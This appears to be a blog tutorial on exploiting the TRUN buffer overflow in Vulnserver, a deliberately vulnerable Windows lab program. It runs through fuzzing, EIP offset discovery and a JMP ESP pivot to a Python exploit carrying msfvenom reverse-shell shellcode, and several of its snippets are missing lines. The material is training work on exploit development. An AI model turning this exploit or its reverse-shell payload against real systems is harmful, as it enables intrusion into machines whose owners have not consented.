Vulnserver TRUN Exploitation

From zero to shell

Blog Vulnserver TRUN Exploitation

| 8 min read

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Vulnserver is the natural next step to follow after finishing the Offsec CTP course. It’s a VbD (Vulnerable-by-Design) application designed to help you sharpen the Windows exploitation skills. You can download the executable here along with the source code. Remember that you must grab the essfunc.dll file as well. However, this post (and the others to come) will try to replicate a grey box scenario that is the most common in real exploitation. In which we only will have access to the binary, and we must start doing things like recognizance, enumeration, and fuzzing.

WARNING: Do NOT run vulnserver.exe on a sensitive machine or a non-secure network. It will be a backdoor that may be used by others to break into your system.

Enumerating Vulnserver

If you launch vulnserver.exe with no options, the default used port will be TCP/9999.


If we type HELP, we can see the available commands. The commands commonly receive a single parameter and will return a simple answer. In this post, we are going to check the TRUN command.


For that, we issue the TRUN command with a single parameter and check the answer.

Fuzzing Vulnserver

Now that we know that the TRUN command receives a single parameter, we can start fuzzing it.

For that, we’ll be using Spike, a protocol fuzzer. More info on Spike can be found here.

As we determined before, TRUN takes a single parameter. Having noted that, we can create the Spike script as simple as:


s_string("TRUN ");

Notice that we are using two different Spike commands. The s_string command will send an immutable string to the fuzzed protocol and s_string_variable tells Spike to mutate that string.

Now we can send the fuzz attack to the victim machine:

Running spike

Look at that: After only 3 iterations, vulnserver.exe stopped working, and it seems that it happened when we sent 5000 bytes of data. We can see this in Wireshark:

Wireshark capture

With that, we can start replicating the crash. For that, we create the first PoC (Proof-of-Concept) file:

import socket

HOST = ''
PORT = 9999

    b'TRUN /.:/' +
    b'A' * 5000

with socket.create_connection((HOST, PORT)) as fd:

This time, let’s attach vulnserver.exe to a debugger. I will use Immunity Debugger with plugin.

So, let’s run the initial exploit and see what happens:

Exploit: take 1

Great! We were able to replicate the crash of Vulnserver.

Controlling EIP

If you look carefully at the image, you can see that the EIP register has the value of 41414141 which is the hex representation of our payload of A. EIP points to the next instruction to be executed, so if we can control EIP, we have full control of the execution flow of the whole application. Beautiful, isn’t it?

But remember that we injected 5000 A, so we must know the exact offset on where EIP gets overwritten. To do that, we can create a cyclic pattern of chars that will help us identify the exact offset that we must inject to the buffer in order to control EIP. We will use a tool from Metasploit called pattern_create.rb:

Running pattern_create.rb.

cd /opt/metasploit-framework/embedded/framework/tools/exploit/
/pattern_create.rb -l 5000

Cyclic pattern

We then add that pattern to our exploit, replacing the buffer of A with our pattern:

import socket

HOST = ''
PORT = 9999

 b'TRUN /.:/' +
 b'<paste pattern here>'

with socket.create_connection((HOST, PORT)) as fd:

And we run the exploit again:

Exploit: take 2

Cyclic pattern on EIP

As you can see, the EIP register now holds the value 386F4337. We need to check the exact offset of that string on our unique cyclic pattern. To do that, we can use pattern_offset.rb from Metasploit:

Pattern offset

Great, it tells us that the EIP gets overwritten starting on the 2003 byte of our buffer. Let’s update the exploit to verify that:

import socket

HOST = ''
PORT = 9999

    b'TRUN /.:/' +
    b'A' * 2003 +
    b'B' * 4 +
    b'C' * (5000 - 2003 - 4)

with socket.create_connection((HOST, PORT)) as fd:

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In this updated exploit, we will send a buffer of 2003 A, then a single 4 byte string of B (whose hex representation is 42) and fill the rest of our 5000 buffer with C. If the offset is correct, EIP will hold the value of 42424242 which are the four bytes of our B buffer:

Correct offset to EIP

Awesome! Now, we know the exact structure of the vulnerability, and we can proceed to exploit it.


Let’s look at the value of the registers at the time of the crash.


As you can see, two registers point to our injected buffer: EAX, and ESP. EAX points at the exact beginning of our injected buffer but includes the chars TRUN /.:/. Those may be translated to harmless ASM instructions but we must not risk our exploitation. However, we have the other register ESP which points directly to our controlled buffer.

Using !mona findmsp inside the debugger, we can find this information, along with the continuous space available for us to inject our shellcode.


!mona findmsp

Mona output

Note that we have 984 bytes after ESP available for us to run anything we’d want. First, we must search on vulnserver.exe and its runtime modules, an instruction that can lead us to execute code starting on the memory region pointed by ESP.

First, let’s find the Vulnserver runtime dependencies:

Runtime dependencies

It is always a good idea to look for instructions on files that are not part of the OS because the address of those instructions will likely change over different Windows versions, and that makes the exploit less portable. Also, a null byte (0x00) on the address of the desired instruction can stop our attack. can also help us to identify the desired instructions on the desired modules, by running:


!mona jmp -r esp -cp nonull -o

JMP ESP instructions

As you can see, there are several JMP ESP instructions we can pick. We are going to pick the one at 62501205. Let’s update the exploit and replace the four B with that address:

import socket
import struct

HOST = ''
PORT = 9999

    b'TRUN /.:/' +
    b'A' * 2003 +
    # 62501205   FFE4             JMP ESP
    struct.pack('<L', 0x62501205) +
    b'C' * (5000 - 2003 - 4)

with socket.create_connection((HOST, PORT)) as fd:

If everything comes as expected, we will hit that JMP ESP instruction that will lead us to execute code on our C buffer. Let’s put a breakpoint at the JMP ESP instruction and run the exploit:

Performing the JMP ESP


All that’s left is to include a shellcode in place of the buffer of C so can execute commands on the victim machine. We will use a reverse shell payload as generated by msfvenom:

Generating reverse shell

As a rule of thumb, get used to generate shellcodes without bad chars that may break the execution flow of our attack, such as null bytes (0x0), line feed (\r or 0xa), and carriage return (\n or 0xd). You can see a detailed way of checking for bad chars on LTER article.

Also, note that our JMP ESP led us to our C but not exactly at the beginning, so we must pad the exploit with some C chars to make the payload slide gracefully to the start of our reverse shell.

Let’s update the exploit:

import socket
import struct

HOST = ''
PORT = 9999

SHELL =  b""
SHELL += b"\xb8\x9e\x3b\xe5\xc4\xda\xcf\xd9\x74\x24\xf4\x5d"
SHELL += b"\x2b\xc9\xb1\x52\x31\x45\x12\x83\xc5\x04\x03\xdb"
SHELL += b"\x35\x07\x31\x1f\xa1\x45\xba\xdf\x32\x2a\x32\x3a"
SHELL += b"\x03\x6a\x20\x4f\x34\x5a\x22\x1d\xb9\x11\x66\xb5"
SHELL += b"\x4a\x57\xaf\xba\xfb\xd2\x89\xf5\xfc\x4f\xe9\x94"
SHELL += b"\x7e\x92\x3e\x76\xbe\x5d\x33\x77\x87\x80\xbe\x25"
SHELL += b"\x50\xce\x6d\xd9\xd5\x9a\xad\x52\xa5\x0b\xb6\x87"
SHELL += b"\x7e\x2d\x97\x16\xf4\x74\x37\x99\xd9\x0c\x7e\x81"
SHELL += b"\x3e\x28\xc8\x3a\xf4\xc6\xcb\xea\xc4\x27\x67\xd3"
SHELL += b"\xe8\xd5\x79\x14\xce\x05\x0c\x6c\x2c\xbb\x17\xab"
SHELL += b"\x4e\x67\x9d\x2f\xe8\xec\x05\x8b\x08\x20\xd3\x58"
SHELL += b"\x06\x8d\x97\x06\x0b\x10\x7b\x3d\x37\x99\x7a\x91"
SHELL += b"\xb1\xd9\x58\x35\x99\xba\xc1\x6c\x47\x6c\xfd\x6e"
SHELL += b"\x28\xd1\x5b\xe5\xc5\x06\xd6\xa4\x81\xeb\xdb\x56"
SHELL += b"\x52\x64\x6b\x25\x60\x2b\xc7\xa1\xc8\xa4\xc1\x36"
SHELL += b"\x2e\x9f\xb6\xa8\xd1\x20\xc7\xe1\x15\x74\x97\x99"
SHELL += b"\xbc\xf5\x7c\x59\x40\x20\xd2\x09\xee\x9b\x93\xf9"
SHELL += b"\x4e\x4c\x7c\x13\x41\xb3\x9c\x1c\x8b\xdc\x37\xe7"
SHELL += b"\x5c\x23\x6f\xe7\x88\xcb\x72\xe7\xa1\x57\xfa\x01"
SHELL += b"\xab\x77\xaa\x9a\x44\xe1\xf7\x50\xf4\xee\x2d\x1d"
SHELL += b"\x36\x64\xc2\xe2\xf9\x8d\xaf\xf0\x6e\x7e\xfa\xaa"
SHELL += b"\x39\x81\xd0\xc2\xa6\x10\xbf\x12\xa0\x08\x68\x45"
SHELL += b"\xe5\xff\x61\x03\x1b\x59\xd8\x31\xe6\x3f\x23\xf1"
SHELL += b"\x3d\xfc\xaa\xf8\xb0\xb8\x88\xea\x0c\x40\x95\x5e"
SHELL += b"\xc1\x17\x43\x08\xa7\xc1\x25\xe2\x71\xbd\xef\x62"
SHELL += b"\x07\x8d\x2f\xf4\x08\xd8\xd9\x18\xb8\xb5\x9f\x27"
SHELL += b"\x75\x52\x28\x50\x6b\xc2\xd7\x8b\x2f\xe2\x35\x19"
SHELL += b"\x5a\x8b\xe3\xc8\xe7\xd6\x13\x27\x2b\xef\x97\xcd"
SHELL += b"\xd4\x14\x87\xa4\xd1\x51\x0f\x55\xa8\xca\xfa\x59"
SHELL += b"\x1f\xea\x2e"

    b'TRUN /.:/' +
    b'A' * 2003 +
    # 62501205   FFE4             JMP ESP
    struct.pack('<L', 0x62501205) +
    b'C' * 32 +
    SHELL +
    b'C' * (5000 - 2003 - 4 - 32 - len(SHELL))

with socket.create_connection((HOST, PORT)) as fd:

And let’s check it:

Our reverse shell

Great! We got our shell!

You can download the final exploit here


This was one of the most straightforward exploits for Vulnserver. Other commands will pose a little more effort, but fear not; we will post here how to exploit them successfully.

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